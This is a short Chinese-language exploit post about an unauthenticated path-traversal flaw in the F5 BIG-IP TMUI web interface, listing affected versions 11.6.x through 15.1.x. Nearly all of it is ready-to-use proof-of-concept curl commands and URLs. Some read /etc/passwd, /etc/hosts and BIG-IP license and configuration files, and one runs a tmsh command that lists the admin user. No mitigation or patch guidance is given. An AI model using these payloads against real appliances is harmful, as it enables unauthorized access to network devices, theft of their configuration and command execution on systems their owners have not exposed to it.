影响范围
版本号主要如下
11.6.x, 12.1.x, 13.1.x, 14.1.x, 15.0.x, 15.1.x
文件读取poc
curl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf

RCE POC
curl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'
本文介绍了一个影响多个F5版本的安全漏洞,包括远程代码执行(RCE)及文件读取漏洞。受影响的版本号包括11.6.x至15.1.x等。通过特定的curl命令,攻击者可以读取敏感文件如/etc/passwd,并尝试执行命令。
2150





